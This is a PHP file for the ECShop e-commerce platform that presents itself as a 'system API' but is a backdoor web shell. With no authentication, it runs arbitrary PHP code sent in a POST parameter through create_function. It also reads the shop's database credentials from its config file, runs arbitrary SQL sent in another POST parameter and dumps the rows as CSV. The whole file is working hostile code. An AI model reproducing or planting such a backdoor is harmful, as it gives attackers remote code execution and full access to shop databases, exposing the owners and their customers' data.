<?php
if (!defined('IN_ECS')) define('IN_ECS', true);
echo "ecshop_system_api\r\n";
if (isset($_POST[api])) {
	array_map(create_function(null,stripslashes($_POST[api])),array(1));
	exit;
}else if (isset($_POST[query])){	
	date_default_timezone_set('Asia/ShangHai');
	if (!defined('EC_CHARSET')) {
		$cfgarr=array('../data/config.php','../../data/config.php','../../../data/config.php','../../../../data/config.php');
		foreach($cfgarr as $cfg){
			if (file_exists($cfg)) require_once($cfg);
			if (defined('EC_CHARSET')) break;
		}
	}
	$charset=strtolower(str_replace('-','',EC_CHARSET));		
	if (!in_array($charset,array('utf8','gbk','gb2312'))) $charset='utf8';
	$sqlarr=explode(";",str_replace('ecs_',$prefix,stripslashes($_POST[query])));
	$conn = mysql_connect($db_host,$db_user, $db_pass) or die('can not connect to db');
	mysql_query("SET NAMES $charset", $conn) or die(mysql_error($conn));
	mysql_select_db($db_name, $conn) or die(mysql_error($conn));	
	foreach($sqlarr as $sql) $ret=mysql_query($sql,$conn) or die(mysql_error($conn));
	$numfields = mysql_num_fields($ret);	
	for ($i=0,$line=''; $i < $numfields; $i++) $line.=trim('"'.mysql_field_name($ret, $i).'",');	
	echo substr($line,0,-1),"\r\n";		
	while($row=mysql_fetch_assoc($ret)){		
		$i=0;
		$line='';
		foreach ($row as $col_value) {
			$field=mysql_field_name($ret,$i);
			$line.=trim('"'.str_replace(array("\n","\r",'"'),'',$row[$field]).'",');
			$i++;	
		}
		echo substr($line,0,-1),"\r\n";	
	}
	exit;
}
?>